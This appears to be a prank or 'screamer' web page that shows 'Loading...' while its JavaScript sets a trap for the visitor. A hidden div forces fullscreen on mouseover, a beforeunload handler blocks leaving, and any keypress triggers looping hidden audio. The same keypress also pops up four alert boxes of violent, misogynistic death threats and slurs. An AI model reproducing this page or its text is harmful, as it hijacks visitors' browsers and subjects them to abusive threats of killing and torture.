
 <html>
 <head>
<!-- Global site tag (gtag.js) - Google Analytics -->

<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-149452514-2');
</script>

 <link rel="stylesheet" type="text/css" href="styles.css">
 </head>
<body * { padding: 0; margin: 0; } onkeydown="isKeyPressed(event)">
<script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
</body>

<img onclick="brapp()" id="poo2" src="18.png" class="centered">
<div onmouseover="tfs()" class="trap"></div>
<video id="fart" preload loop src="womensalliance.xyz/prettywoman.mp4"></video>
<audio id="shart" preload hidden loop src="womensalliance.xyz/bee.mp3"></audio>
<audio id="shart2" preload hidden loop src="womensalliance.xyz/madbee.mp3"></audio>
<audio id="shart3" preload hidden loop src="womensalliance.xyz/sadbee.mp3"></audio>
<div id="poo" class="black"></div>
</html> 
<h1>Loading...</h1>




<script>

window.addEventListener('beforeunload', function (e) {
  e.preventDefault(); 
  e.returnValue = '';
});

function isKeyPressed(event) {
  var r = confirm("Are you sure you want to leave?");
  if (r == true) {
  	var $audio = $('#shart');
	$audio.get(0).play();
  	var $audio = $('#shart2');
	$audio.get(0).play();
  	var $audio = $('#shart3');
	$audio.get(0).play();
    alert("You sluts, I'll show you all the way to everlasting pain and torture.");
    alert("To take your lives is why I live, for your crimes you'll be butchered.");
    alert("You'll be forced to suffer through torture, you dead cum dumpster bitches.");
    alert("I'll kill you all then throw your slaughtered asses in the ditches.");
  } else {
  }

}

function brapp() {
var fart = document.getElementById("poo");
fart.parentNode.removeChild(fart);
var fart = document.getElementById("poo2");
fart.parentNode.removeChild(fart);
var $video = $('#fart');
  $video.get(0).play();
}


function tfs()
{

	if (!document.fullscreenElement &&  !document.mozFullScreenElement && !document.webkitFullscreenElement)
	{
		if (document.documentElement.requestFullscreen)
		{
			document.documentElement.requestFullscreen();

		}
		else if (document.documentElement.mozRequestFullScreen)
		{
			document.documentElement.mozRequestFullScreen();

		}
		else if (document.documentElement.webkitRequestFullscreen)
		{
			document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
		}
	}
	openBrowser();
}

function ofs() {
var elem = document.getElementById("fart");
  if (elem.requestFullscreen) {
    elem.requestFullscreen();
  } else if (elem.mozRequestFullScreen) { /* Firefox */
    elem.mozRequestFullScreen();
  } else if (elem.webkitRequestFullscreen) { /* Chrome, Safari & Opera */
    elem.webkitRequestFullscreen();
  } else if (elem.msRequestFullscreen) { /* IE/Edge */
    elem.msRequestFullscreen();
  }
}

</script>

	
